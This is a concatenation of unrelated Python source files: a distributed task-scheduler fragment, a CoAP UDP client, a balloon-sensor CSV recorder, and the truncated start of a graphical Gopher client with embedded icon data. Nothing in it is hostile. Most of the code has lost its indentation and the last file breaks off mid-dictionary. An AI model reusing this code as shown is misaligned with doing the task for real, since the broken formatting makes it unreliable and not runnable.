Only if new_config == False:
- config_key: Internal key for config
- resume_from: config promoted from this milestone
- milestone: config promoted to this milestone (next from resume_from)
"""
# adding the task
cls = TaskScheduler
if not task.resources.is_ready:
cls.RESOURCE_MANAGER._request(task.resources)
job = cls._start_distributed_job(task, cls.RESOURCE_MANAGER)
new_dict = self._dict_from_task(task)
new_dict['Job'] = job
with self.LOCK:
self.scheduled_tasks.append(new_dict)
def run_job(self, task):
"""Run a training task to the scheduler (Sync).
"""
cls = TaskScheduler
cls.RESOURCE_MANAGER._request(task.resources)
job = cls._start_distributed_job(task, cls.RESOURCE_MANAGER)
return job.result()
@staticmethod
def _start_distributed_job(task, resource_manager):
"""Async Execute the job in remote and release the resources
"""
logger.debug('\nScheduling {}'.format(task))
job = task.resources.node.submit(TaskScheduler._run_dist_job,
task.fn, task.args, task.resources.gpu_ids)
def _release_resource_callback(fut):
logger.debug('Start Releasing Resource')
resource_manager._release(task.resources)
job.add_done_callback(_release_resource_callback)
return job
@staticmethod
def _run_dist_job(fn, args, gpu_ids):
"""Remote function Executing the task
"""
if '_default_config' in args['args']:
args['args'].pop('_default_config')
if 'reporter' in args:
local_reporter = LocalStatusReporter()
dist_reporter = args['reporter']
args['reporter'] = local_reporter
manager = mp.Manager()
return_list = manager.list()
def _worker(return_list, gpu_ids, args):
"""Worker function in thec client
"""
if len(gpu_ids) > 0:
# handle GPU devices
os.environ['CUDA_VISIBLE_DEVICES'] = ",".join(map(str, gpu_ids))
os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = "0"
# running
try:
ret = fn(**args)
except AutoGluonEarlyStop:
ret = None
return_list.append(ret)
try:
# start local progress
p = CustomProcess(target=_worker, args=(return_list, gpu_ids, args))
p.start()
if 'reporter' in args:
cp = Communicator.Create(p, local_reporter, dist_reporter)
p.join()
except Exception as e:
logger.error('Exception in worker process: {}'.format(e))
ret = return_list[0] if len(return_list) > 0 else None
return ret
def _clean_task_internal(self, task_dict):
pass
def _cleaning_tasks(self):
with self.LOCK:
new_scheduled_tasks = []
for task_dict in self.scheduled_tasks:
if task_dict['Job'].done():
self._clean_task_internal(task_dict)
self.finished_tasks.append(self._dict_from_task(task_dict))
else:
new_scheduled_tasks.append(task_dict)
if len(new_scheduled_tasks) < len(self.scheduled_tasks):
self.scheduled_tasks = new_scheduled_tasks
def join_tasks(self):
warn("scheduler.join_tasks() is now deprecated in favor of scheduler.join_jobs().",
AutoGluonWarning)
self.join_jobs()
def join_jobs(self, timeout=None):
"""Wait all scheduled jobs to finish
"""
self._cleaning_tasks()
for task_dict in self.scheduled_tasks:
try:
task_dict['Job'].result(timeout=timeout)
except TimeoutError as e:
logger.error(str(e))
self._clean_task_internal(task_dict)
self._cleaning_tasks()
def shutdown(self):
"""shutdown() is now deprecated in favor of :func:`autogluon.done`.
"""
warn("scheduler.shutdown() is now deprecated in favor of autogluon.done().",
AutoGluonWarning)
self.join_jobs()
self.REMOTE_MANAGER.shutdown()
def state_dict(self, destination=None):
"""Returns a dictionary containing a whole state of the Scheduler
Examples
--------
>>> ag.save(scheduler.state_dict(), 'checkpoint.ag')
"""
if destination is None:
destination = OrderedDict()
destination._metadata = OrderedDict()
destination['finished_tasks'] = pickle.dumps(self.finished_tasks)
destination['TASK_ID'] = Task.TASK_ID.value
return destination
def load_state_dict(self, state_dict):
"""Load from the saved state dict.
Examples
--------
>>> scheduler.load_state_dict(ag.load('checkpoint.ag'))
"""
self.finished_tasks = pickle.loads(state_dict['finished_tasks'])
Task.set_id(state_dict['TASK_ID'])
logger.debug('\nLoading finished_tasks: {} '.format(self.finished_tasks))
@property
def num_finished_tasks(self):
return len(self.finished_tasks)
def __repr__(self):
reprstr = self.__class__.__name__ + '(\n' + \
str(self.RESOURCE_MANAGER) +')\n'
return reprstr
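# Illustrative checkpoint round-trip (not part of this module), following the
# ag.save / ag.load examples from the docstrings above; `ag` is assumed to be
# the autogluon package and `scheduler` an existing TaskScheduler instance.
#
#     scheduler.join_jobs()
#     ag.save(scheduler.state_dict(), 'checkpoint.ag')
#     ...
#     scheduler.load_state_dict(ag.load('checkpoint.ag'))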
|
coap.py
|
import logging
import random
import socket
import threading
import time
import collections
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
__author__ = 'Giacomo Tanganelli'
logger = logging.getLogger(__name__)
class CoAP(object):
"""
Client class to perform requests to remote servers.
"""
def __init__(self, server, starting_mid, callback, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize the client.
:param server: Server address for incoming connections
:param callback: the callback function to be invoked when a response is received
:param starting_mid: used for testing purposes
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
self._currentMID = starting_mid
self._server = server
self._callback = callback
self._cb_ignore_read_exception = cb_ignore_read_exception
self._cb_ignore_write_exception = cb_ignore_write_exception
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
addrinfo = socket.getaddrinfo(self._server[0], None)[0]
if sock is not None:
self._socket = sock
elif addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# the below line allows for border router to multicast
self._socket.setsockopt(socket.SOL_SOCKET,25, str("wpan0" + '\0').encode('utf-8'))
self._receiver_thread = None
def purge_transactions(self, timeout_time=defines.EXCHANGE_LIFETIME):
"""
Clean old transactions
"""
self._messageLayer.purge(timeout_time)
def close(self):
"""
Stop the client.
"""
self.stopped.set()
for event in self.to_be_stopped:
event.set()
if self._receiver_thread is not None:
self._receiver_thread.join()
# self._socket.close()
@property
def current_mid(self):
"""
Return the current MID.
:return: the current mid
"""
return self._currentMID
@current_mid.setter
def current_mid(self, c):
"""
Set the current MID.
:param c: the mid to set
"""
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message, no_response=False):
"""
Prepare a message to send on the UDP socket, setting up retransmissions if needed.
:param message: the message to send
:param no_response: whether to await a response from the request
"""
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
if no_response:
# don't add the send message to the message layer transactions
self.send_datagram(request)
return
transaction = self._messageLayer.send_request(request)
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
@staticmethod
def _wait_for_retransmit_thread(transaction):
"""
Only one retransmit thread at a time, wait for other to finish
"""
if hasattr(transaction, 'retransmit_thread'):
while transaction.retransmit_thread is not None:
logger.debug("Waiting for retransmit thread to finish ...")
time.sleep(0.01)
continue
def _send_block_request(self, transaction):
"""
A former request resulted in a block wise transfer. With this method, the block wise transfer
will be continued, including triggering of the retry mechanism.
:param transaction: The former transaction including the request which should be continued.
"""
transaction = self._messageLayer.send_request(transaction.request)
# ... but don't forget to reset the acknowledge flag
transaction.request.acknowledged = False
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
def send_datagram(self, message):
"""
Send a message over the UDP socket.
:param message: the message to send
"""
host, port = message.destination
logger.info("send_datagram - " + str(message))
serializer = Serializer()
raw_message = serializer.serialize(message)
try:
self._socket.sendto(raw_message, (host, port))
except Exception as e:
if self._cb_ignore_write_exception is not None and callable(self._cb_ignore_write_exception):
if not self._cb_ignore_write_exception(e, self):
raise
# if you're explicitly setting that you don't want a response, don't wait for it
# https://tools.ietf.org/html/rfc7967#section-2.1
for opt in message.options:
if opt.number == defines.OptionRegistry.NO_RESPONSE.number:
if opt.value == 26:
return
if self._receiver_thread is None or not self._receiver_thread.is_alive():
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.daemon = True
self._receiver_thread.start()
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
name=str('%s-Retry-%d' % (threading.current_thread().name, message.mid)),
args=(transaction, message, future_time, 0))
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
logger.debug("retransmit loop ... enter")
while retransmit_count <= defines.MAX_RETRANSMIT \
and (not message.acknowledged and not message.rejected) \
and not transaction.retransmit_stop.is_set():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not transaction.retransmit_stop.is_set():
retransmit_count += 1
future_time *= 2
if retransmit_count < defines.MAX_RETRANSMIT:
logger.debug("retransmit loop ... retransmit Request")
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
# Inform the user, that nothing was received
self._callback(None)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
logger.debug("retransmit loop ... exit")
def receive_datagram(self):
"""
Receive datagram from the UDP socket and invoke the callback function.
"""
logger.debug("Start receiver Thread")
while not self.stopped.is_set():
self._socket.settimeout(0.1)
try:
datagram, addr = self._socket.recvfrom(1500)
except socket.timeout: # pragma: no cover
continue
except Exception as e: # pragma: no cover
if self._cb_ignore_read_exception is not None and callable(self._cb_ignore_read_exception):
if self._cb_ignore_read_exception(e, self):
continue
return
else: # pragma: no cover
if len(datagram) == 0:
logger.debug("Exiting receiver Thread due to orderly shutdown on server end")
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
logger.info("receive_datagram - " + str(message))
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
self._wait_for_retransmit_thread(transaction)
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
self._send_block_request(transaction)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
logger.debug("Exiting receiver Thread due to request")
self._socket.close()
def _send_ack(self, transaction):
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
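# Illustrative usage sketch (not part of this module). It builds a confirmable
# GET request with the Request class imported above and prints responses via
# the callback; the host/port/path and the attributes set on the request follow
# common CoAPthon usage and should be treated as assumptions.
#
#     def on_response(response):
#         print(response)
#
#     client = CoAP(server=("127.0.0.1", 5683), starting_mid=random.randint(1, 65535), callback=on_response)
#     request = Request()
#     request.destination = ("127.0.0.1", 5683)
#     request.code = defines.Codes.GET.number
#     request.type = defines.Types["CON"]
#     request.uri_path = "hello"
#     client.send_message(request)
#     time.sleep(2)
#     client.close()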
|
measure_recorder.py
|
import time
import threading
import csv
import os.path
import datetime
import logging
class MeasureRecorder:
"""Records the measures and writes the to csv-file"""
def __init__(self, data_file, measure_frequency_sec, board, gps, bme280InCapsule, bme280Outside):
self._logger = logging.getLogger(self.__class__.__name__)
self._data_file = data_file
self._measure_frequency_sec = measure_frequency_sec
self._board = board
self._gps = gps
self._bme280InCapsule = bme280InCapsule
self._bme280Outside = bme280Outside
def start_measures(self):
thread = threading.Thread(target=self._start, name="MeasurerRecorderThread")
thread.start()
def _start(self):
if not os.path.exists(self._data_file):
header = ["time_utc", "board_temp", "board_volts_core", "board_volts_sdram_c", "board_volts_sdram_i", "board_volts_sdram_p", "board_throttled",
"gps_utc", "gps_latitude", "gps_longitude", "gps_altitude", "gps_speed_km/h", "gps_heading", "gps_ascending_rate_m/s",
"capsule_temp", "capsule_humidity", "capsule_pressure", "capsule_baro_altitude", "capsule_ascending_rate_m/s",
"out_temp", "out_humidity", "out_pressure", "out_baro_altitude", "out_ascending_rate_m/s"]
with open(self._data_file, 'wt') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(header)
while (True):
try:
with open(self._data_file, 'a') as csvfile:
startSample = datetime.datetime.utcnow()
gps_time = "n/a"
gps_latitude = 0
gps_longitude = 0
gps_altitude = 0
gps_speed = 0
gps_heading = 0
gps_ascending_rate = 0
try:
gps_time = time.strftime('%Y-%m-%dT%H:%M:%SZ', self._gps.utc())
gps_latitude = self._gps.latitude()
gps_longitude = self._gps.longitude()
gps_altitude = self._gps.altitude()
gps_speed = self._gps.speed()
gps_heading = self._gps.heading()
gps_ascending_rate = self._gps.ascending_rate()
except:
self._logger.exception("Error reading gps-sensor")
capsule_temp = 0
capsule_humidity = 0
capsule_pressure = 0
capsule_altitude = 0
capsule_ascending_rate = 0
try:
capsule_temp = self._bme280InCapsule.temp()
capsule_humidity = self._bme280InCapsule.humidity()
capsule_pressure = self._bme280InCapsule.pressure()
capsule_altitude = self._bme280InCapsule.altitude()
capsule_ascending_rate = self._bme280InCapsule.ascending_rate()
except:
self._logger.exception("Error reading capsule-bme280-sensor")
outside_temp = 0
outside_humidity = 0
outside_pressure = 0
outside_altitude = 0
outside_ascending_rate = 0
try:
outside_temp = self._bme280Outside.temp()
outside_humidity = self._bme280Outside.humidity()
outside_pressure = self._bme280Outside.pressure()
outside_altitude = self._bme280Outside.altitude()
outside_ascending_rate = self._bme280Outside.ascending_rate()
except:
self._logger.exception("Error reading outside-bme280-sensor")
data = [startSample.replace(tzinfo=datetime.timezone.utc).isoformat(timespec='milliseconds'),
self._board.temp(),
self._board.volt_core(),
self._board.volt_sdram_c(),
self._board.volt_sdram_i(),
self._board.volt_sdram_p(),
self._board.throttled(), #0x5 means: under voltage, currently throttled. See https://www.raspberrypi.org/forums/viewtopic.php?f=63&t=147781&start=50#p972790
gps_time,
"{:0.6f}".format(gps_latitude),
"{:0.6f}".format(gps_longitude),
"{:0.2f}".format(gps_altitude),
"{:0.2f}".format(gps_speed),
"{:0.2f}".format(gps_heading),
"{:0.2f}".format(gps_ascending_rate),
"{:0.2f}".format(capsule_temp),
"{:0.2f}".format(capsule_humidity),
"{:0.5f}".format(capsule_pressure),
"{:0.2f}".format(capsule_altitude),
"{:0.2f}".format(capsule_ascending_rate),
"{:0.2f}".format(outside_temp),
"{:0.2f}".format(outside_humidity),
"{:0.5f}".format(outside_pressure),
"{:0.2f}".format(outside_altitude),
"{:0.2f}".format(outside_ascending_rate)
]
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(data)
endSample = datetime.datetime.utcnow()
timeToReadSensors = (endSample - startSample).total_seconds()
sleepTime = self._measure_frequency_sec
if (timeToReadSensors < self._measure_frequency_sec):
sleepTime -= timeToReadSensors
            except:
                self._logger.exception("Exception in measure_recorder-loop")
                # Fall back to the full interval if the sensor reads failed part-way.
                sleepTime = self._measure_frequency_sec
            time.sleep(sleepTime)
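# Illustrative usage sketch (not part of the original module). The sensor
# objects below are hypothetical stand-ins that answer every reading with a
# constant, just to show how MeasureRecorder is wired together; real board,
# GPS and BME280 drivers would be passed in instead.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)

    class _StubSensor:
        # Answer any reading method (temp(), humidity(), ...) with 0.
        def __getattr__(self, name):
            return lambda *args, **kwargs: 0

    class _StubGps(_StubSensor):
        # utc() must return a struct_time for time.strftime() in _start().
        def utc(self):
            return time.gmtime()

    recorder = MeasureRecorder("measures.csv", 5, _StubSensor(), _StubGps(),
                               _StubSensor(), _StubSensor())
    recorder.start_measures()  # appends one row roughly every 5 seconds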
|
TreeGopher.py
|
import queue
import threading
import pituophis
import PySimpleGUI as sg
import pyperclip
import os
# This is a graphical Gopher client in under 250 lines of code, implemented with Pituophis and PySimpleGUI for an interface. Pyperclip is used for the "Copy URL" feature.
# A tree is used for loading in menus, similar to the likes of WSGopher32 and Cyberdog. Backlinks are cut out, and menus are trimmed of blank selectors. Threaded binary downloads are supported as well.
# Based on the Chat interface example here: https://pysimplegui.trinket.io/demo-programs#/demo-programs/chat-instant-message-front-end
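# To try it (illustrative): install the imports above (pituophis, PySimpleGUI, pyperclip) and run `python TreeGopher.py`; the default URL gopher://gopherproject.org/1/ is loaded into the tree when you press Go.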
icons = {'1': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAAsSAAALEgHS3X78AAABnUlEQVQ4y8WSv2rUQRSFv7vZgJFFsQg2EkWb4AvEJ8hqKVilSmFn3iNvIAp21oIW9haihBRKiqwElMVsIJjNrprsOr/5dyzml3UhEQIWHhjmcpn7zblw4B9lJ8Xag9mlmQb3AJzX3tOX8Tngzg349q7t5xcfzpKGhOFHnjx+9qLTzW8wsmFTL2Gzk7Y2O/k9kCbtwUZbV+Zvo8Md3PALrjoiqsKSR9ljpAJpwOsNtlfXfRvoNU8Arr/NsVo0ry5z4dZN5hoGqEzYDChBOoKwS/vSq0XW3y5NAI/uN1cvLqzQur4MCpBGEEd1PQDfQ74HYR+LfeQOAOYAmgAmbly+dgfid5CHPIKqC74L8RDyGPIYy7+QQjFWa7ICsQ8SpB/IfcJSDVMAJUwJkYDMNOEPIBxA/gnuMyYPijXAI3lMse7FGnIKsIuqrxgRSeXOoYZUCI8pIKW/OHA7kD2YYcpAKgM5ABXk4qSsdJaDOMCsgTIYAlL5TQFTyUIZDmev0N/bnwqnylEBQS45UKnHx/lUlFvA3fo+jwR8ALb47/oNma38cuqiJ9AAAAAASUVORK5CYII=',
'0': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACRklEQVQ4jX3TvU8iQRgGcGorG5PNJlzOHImFxXXmSgu1pLYkFhbGFmta6Cn8U6ysbAzgfgwwM6y7sx8z67IgMuoq1XPNSSTovclTvr95JpMplf5No9HYbLfbRrvdNlqtltFqtYxGo2HU63WjXq8bZ2dnRq1WM2q1mnF6erpR+jyXl5cbhJDb0WgkP4dzLhljklIqh8OhJIRI27blzc3N7f7+/uYSaDabJudcBUGAKIoQRRHiOEaSJJBSrsVxnLRarZqlT/VNzrkKwxBxHMN1XXQ6HXS73bWkaQpCyNdAFEWQUsLzPDDGwDnHaDRaSZZl68DFxYXJOVdCCKRpin6/j16vB8uy1pLnOQgh6eHh4SrAGFNCCDw8PEAIAc/zcH9/D9/34fs+giBAEASYTqfrwPn5uUkpVUopZFkGSiksy4Jt23AcB67rghACQghms9n3QJqmGI/HCMMQvu9DCIE8zzGfz6G1htYa8/kcg8FgFTg5OTGHw6EKggB5nq8AYRiuPOvz8zP6/f4qcHx8bBJCVJIkmEwmiOMYQojlopQSSikopfD6+vo9kGUZJpMJOOfLOw8GA1BKwRgDYwxFUawD1WrVdF1XZVmG6XSKJEmW1T9OXywWWCwWXwMHBwc/er3e+KPB4+Mjnp6eoLXGy8sLiqLA+/s73t7eUBQFbNvO9/b2tpeAYRg/r66uPMuyZp1OR3e7XX13d6cty9KO42jXdZehlI6vr6+9ra2tysqP3NnZ2d7d3f1dqVT+/C9HR0flcrn862PvLwGSkDy9SoL4AAAAAElFTkSuQmCC',
'7': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACqUlEQVQ4jY2SXUhTYRjHn4pQtEJDGUU3dSV4U0hEV43uRlcl1oVd2Ae7KD+mJZUEnhzuhB+JLXaQdTbzuCMu54VG0XHfx2Q723Eed+bcmdOsdCOn6NRFmjvdSIjm6g/Pzfvw+/Hw5wXYlcbGRoler5d2d3dfRVH0zO592lAURbJj/vVP3kDK7vanRseDG3a7/XNbW1vOP2Gapm20J7CFGlyBN0PC5OuPQf6pbsTTRzFrHMetdXR05O0LDw4O1g97+C1VD8vNLawvRBeT8fB84isjxIVHuJvuG2JXaZqO7StwOOilZ7gtyghxYSa2+mX2e2I6HF3h2ak4qzTybxVqi9Pnn/yFouj5PTCCIHnOESZZrbFy3qlF/8TsMhuaTwxPfFs2U6NzpELHNt9usbx3jYVEg8FQt0eAomiuy+1NVr2yBCkuavEKC++4mSXSNh5TPiZ8d6txtu5Oi8Pk4UKiTqcr3yMQRfGAw+GIvyCd8XKt96UCZxUKLXvtPu6+WImz16twtvaJxuL0jQd+VlRUnPtrB11dXWVCOJKq1ph99zB3faWWvVWlZW9Uall5WbO5x8cLmwRBTO1bIgAARVF6IRxJYSZXrFZjZh5iFstzwhka9QspnudTnZ2dolKptKWVkCT5gGGYlYnJ0AYfDG1yHLdOEMQHkiSTJpNJVKvVokqlmk4rQRAkE0GQgoaGhgtyufwEABwsKSnJxzDsR29vr4hhmNjU1JQoKio6vJM7BACZAHAUAHIpiroUiURqwuFwTX9//2UAkGRlZZ1sb29fIklSHBgYEI1G45+PdXAHfBwAJMXFxQU4jss0Gs0VqVR6FgBOA8ApAJC0traGgsGgaLVaVwoLC4/sviIDALIB4BgA5ABA7vbkbL9lA0BGaWnpTZlMlp+2i//Nb4XAbVOmOUFgAAAAAElFTkSuQmCC',
'h': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAC60lEQVQ4jYWTa0jTARTFb2grQijsW0kULfqW9sIia1ZkWVSmWRFhWUJqrexhoLMaFOTUMgktH/goclqW23y0NfO5Tc1tOififC7XKKnUzE3d+v9PX2JYjTyfz/lxufdcojkVvGBuz1+KFxbsyyySS4pK6npyimu7EkRSKf/Gs4srVwYu/G+Qy+UvKBLXNNU2GxiVthszMzOofqeCrNWCPJkeoqzX1qDTGRvdhgMDAz1lco21obULGm0njOYvqGvrhqrLCoV+GMrG9+jtG4SyrunnzmMJ2/4B5D1XvmIYBlNTU9C1G9BtHcOHcRYGix1KTTsmbTYwDAOr1Yr0zMIfXO6s3fj78326TQNOlmVRp2qF6fM0zOOAeRzosNjRqjeiuLIJFUo1+voHoNXqcDRSmOQCCO6Kjw8OWSBRNKGxdwL9o8DgGNAz4oTKaMGMwwGbzYbhj5+gbTfgtawaUXxhpwsgTHuR0qLvwlN5B6oMo2joncR7sx2a/gk064xgWRYsy8Jut+NVhQLil+U4fO6eiiicQ0REMQnFcQ9KtciXatDTb0bp2zaINZ9Q1GBBgUyDD8Mf8X3iB0ZGRqDV6XBB8BAhEaJ61wRHIlK3CvMbmTxpC1iWhcPhQJlCg5SyTgjFBlzNbUZW8RuYTCZUVb/BgeiHCD52+7EL4Od3ZsmlZJk+KVuJ0bExOJ1OfPk6irisesRmqhGRVovr919ArVYj80kuDkamTvP2Xtr5xxm3H0k8ESuqdCRnl2FoaAjZT8twUlSDsDtyBAsqcCoxFxKJBGf4Quw+GCdx16XVG4LO5ySlP2eq5Qrsu/YMu+LLwbtSiu2xheBFPUK84A627DlrIs+FPCLy/huwjIh2rPENyg6NFHwLu5rLHrqch/0xjxESnYHgEzcn/fxDaz08PMKJyJeI3D6ZNxGt53C8w3xWbL61btPhEr+AsPJVawMyvLyWRxMRj4jWENF8d+HZmkdEi34DlxLRYiLiuDP+AiIvzWJ84dNQAAAAAElFTkSuQmCC',
'i': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJUlEQVQ4jWNgGAWjYBQME8D4//9/TkZGxu+kavz//z83AwODEQAPzAc8kOdqJQAAAABJRU5ErkJggg==',
'3': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACuklEQVQ4jX3T20pUcRQG8A8cpPZpcnSHmmZmhGVjBzTNiMxy//fM1OigXfUARVc9QvQMkQTdRFAg1E0lIlu0k5SlNZmZZzPMpnL27BkPeZi+LppMwVrw3a3fWjdrARtUl8tVNZSdfWVk5847IwUFtwezsi4/crmqNupdVy+A3eNeb6fj960sNTYwWV/HZKiei40NtE1jebSkpL0L2LUhHpVl75ejVZGfoRB/+nxMmiaTpsll0+SSaXJJCC7UBfmpony6Nz197zrcAuhTZQcnk2dOc+UPEoKLQvCHEFwQgvNCcE4Izgb8HCvdN2YBmasDhgsLbvwI+FfRHzAvBGeFYMIwGDcMOobBWG0to8JgOD+nCQBwE8icKjs0tWCaf7cIwYQQjAvxGwlBWwhGDYMzQvC7z8chb8nHZsCDTqD8W/VxzgYCTDQ1MW5ZjFsWnTWJtbUxZlmMWRaj164xEghw4shh3gf2o2vz5rMzp2roBIOMt7czkUisSywWo23btG2bjuMw2trKz8EgxyvL2ZGWVo9nLlfNtHGSM6EQnY6OVRiPx1fh2kzfusXR4mIOFBfRAo6hGdg2VFqSiBgGI34/pyoqOJGTwzG3myOaxmFN45Cm8YOqckBV+V5V+U5V2FuYG70L5KAZSO/Zkdc6rmdxVNM4kgKDqsoPKdCvKHynKOxTFIZlmWHPFj7epj+oBlwAAAs40leUPze4Zkt/CrxNodeyzF5ZZo8k8fn27MRDoGzdMT3V5Evh7bnLfZrGsCzzTQr1SBJfSRJfShJfyjK78rcudyrSxQ3P+bFbudBdkPv1te5hr2cLuxWF3bLM7gw3n+sePsnTI21u6fy/fmkTgKITQMP1DO3Bva2eiZY83b6fpzvNesbkVY/cWgmcA1AKQP/fU0oAcgHsOQBUlwI1ALwAdgDIAJC2tvkXFRyzrLKhFPAAAAAASUVORK5CYII=',
'9': b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAC+0lEQVQ4jXVSX0gbBxz+tm7UIt2cL33pU0tf7MPc9jAGUgajb3kb+NI+CC10o+QhQ7YnEXTii4IpZEnUwD0UhRj1vJx3OfLv4sXsDAQ1eGpcjH849e6yIxcNadfBfn1ZS632e/6+D74/wAfg8XjaBUFQ4/H4kc/n6/wQ7xxCodADt9v9GQB4vd5v8vn8i62tLYpEIh4A6OnpaYlEIj9dEIbD4Svz8/OPFEX5JxqN/smy7G/pdHr14OCATNOkzc3NciaT8aqqmrJtm1Kp1HO32331nAnDMD9ns9lXGxsbpGka6bpOlmXR6ekpNZtNsm2bHMch0zRJFMVnl0YQBCGxt7dHx8fHZNs2NRoNchyH6vU62bZN1WqV8vn8Xm9vb+sF8cDAwN1CoVA3DIMcxyHDMHRZlseTyeTvOzs7a4Zh0NHREZVKJWIY5qnH42kHAIyPj3dyHMepqlqwLIvOzs6oWq3+t7Cw8Osb80AgcH91dXV/d3eXNE2jXC5XEwRhPRAI/IKpqaknlUqFarUaNZtNajQaVKlUzgYHB2+/M+k1SZJSxWKRVlZWaGlpiRKJBPn9/ikEg8HbsVjsD1VVs/V6nWq1GpmmSSzLDgWDwU8BwO/3/yjL8kkul6NMJkPhcHglFAr1jY6OfvW2A6/Xe2d7e/vUsiw6OTmhcrn8tyzLYVEUJwuFwl+KolA8HqdoNEoTExMPL11BUZS4rut0eHhIpVKJ1tfXSVVVkmWZYrEYsSxLHMe9GBsbu3dBPDc397RcLr/a39+nYrFIa2trtLy8TMlkkgRBIJ7naXFxkRKJBHEcVxgaGrpx7onpdPqJpmkveZ5PTU5ODs7MzGxIkvQvz/M0Ozur+3y+0MjIyANJknanp6fnLkvQ2tfX97itra0TwHcdHR0PGYbRRVGk/v7+GQD3AHS6XK7vAXwB4KP3Da4CuAHgDoCvW1pafhgeHs4yDGN1d3f3AvgWQAeAmwCuX1ri//gYwDUAn3d1dd1yuVxfAmgH0Argk/fJrwEaXuWjl/RWWwAAAABJRU5ErkJggg==',
